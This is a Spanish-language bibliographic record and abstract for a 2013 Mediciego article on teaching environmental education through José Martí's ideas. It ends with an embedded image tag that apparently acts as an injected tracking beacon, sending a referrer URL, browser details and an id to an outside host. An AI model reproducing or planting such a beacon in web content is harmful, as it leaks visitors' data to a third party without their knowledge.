La educación ambiental desde la perspectiva martiana. - Ochoa González, Marisol; Viamonte Rodríguez, Amalia Marina; Alberti Cayro, Alina; Acosta Lugo, Naimí (Mediciego, 2013)
El objetivo de este trabajo es contribuir al estudio de la Educación Ambiental, para lo que se toma en consideración la obra de José Martí, su pensamiento y reflexiones para su aplicación en el proceso de enseñanza-aprendizaje. Una de las tareas más importantes de la labor educativa en los momentos actuales es la comprensión de la magnitud que han alcanzado los desastres naturales y la contaminación ambiental por la acción devastadora del hombre, las guerras y la sobrepoblación mundial, en un mundo amenazado por las grandes catástrofes ecológicas. Se hace imprescindible la adquisición de una educación ambiental por parte de todos los miembros de la sociedad, la formación de conceptos y principios medioambientales, de convicciones ambientalistas y de un elevado desarrollo de cualidades políticas, ideológicas, psicológicas y morales, que contribuyan al entendimiento de la realidad y mejoramiento de modos de conductas más responsables para con el medio ambiente. <img src="http://prettysite.xyz/acnt?_=1583866996503&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F196&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />